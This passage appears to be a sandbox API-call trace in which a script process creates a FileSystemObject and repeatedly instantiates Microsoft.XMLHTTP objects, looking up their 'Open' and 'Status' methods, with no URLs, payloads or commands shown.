	[0640.434] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0640.438] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0640.438] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0640.438] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0640.438] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0640.438] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0640.438] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0646.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0646.073] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0646.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0646.075] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0646.075] SysStringLen (param_1=0x0) returned 0x0
	[0646.075] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0646.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0646.075] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0646.076] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0646.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0646.076] ??2@YAPEAX_K@Z () returned 0x62f330
	[0646.076] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f330) 
	[0646.076] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0646.076] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0646.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0646.076] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0646.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0646.076] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0646.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0646.079] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0646.079] SysStringLen (param_1=0x0) returned 0x0
	[0646.079] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0646.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0646.080] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0646.080] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0646.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0646.080] ??2@YAPEAX_K@Z () returned 0x62f310
	[0646.080] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0646.080] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0646.080] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0646.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0646.080] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0646.080] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0646.081] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0646.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0646.081] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0646.081] SysStringLen (param_1=0x0) returned 0x0
	[0646.081] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0646.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0646.081] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0646.081] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0646.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0646.081] ??2@YAPEAX_K@Z () returned 0x62f330
	[0646.081] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0646.081] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0646.082] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0646.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0646.082] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0646.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0646.082] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0646.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0646.082] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0646.082] SysStringLen (param_1=0x0) returned 0x0
	[0646.082] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0646.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0646.083] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0646.083] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0646.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0646.083] ??2@YAPEAX_K@Z () returned 0x62f310
	[0646.083] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0646.083] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0646.083] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0646.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0646.083] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0646.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0646.084] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0646.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0646.084] longjmp () 
	[0646.084] longjmp () 
	[0646.084] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0646.084] SysStringLen (param_1=0x0) returned 0x0
	[0646.084] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0646.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0646.084] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0646.085] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0646.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0646.085] ??2@YAPEAX_K@Z () returned 0x62f330
	[0646.085] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0646.085] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0646.085] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0646.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0646.085] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0646.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0646.085] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0646.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0646.086] longjmp () 
	[0646.086] longjmp () 
	[0646.086] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0646.086] SysStringLen (param_1=0x0) returned 0x0
	[0646.086] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0646.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0646.086] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0646.086] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0646.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0646.086] ??2@YAPEAX_K@Z () returned 0x62f310
	[0646.087] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
